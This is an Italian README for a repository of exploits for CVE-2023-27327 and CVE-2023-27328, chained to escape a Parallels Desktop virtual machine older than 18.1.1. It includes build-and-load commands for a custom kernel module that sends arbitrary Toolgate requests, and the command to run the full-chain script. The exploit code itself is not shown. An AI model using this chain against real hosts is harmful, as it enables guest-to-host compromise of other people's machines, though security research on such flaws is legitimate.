
Exploit per CVE-2023-27327 e CVE-2023-27328
Questa repository contiene exploit per CVE-2023-27327 e CVE-2023-27328, che possono essere utilizzati insieme per evadere da una macchina virtuale Parallels Desktop, precedente a Parallels Desktop 18.1.1.
Contiene anche il codice per un modulo kernel necessario, in prl_mod, che può essere utilizzato per inviare richieste Toolgate arbitrarie (< opcode 0x8000) dallo spazio utente, usando una voce proc creata in /proc/driver/prl_tg_pwn.
Costruisci e carica il modulo kernel:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
Esegui l'exploit:
cd ..
pip install -r requirements.txt
./3_full_chain.py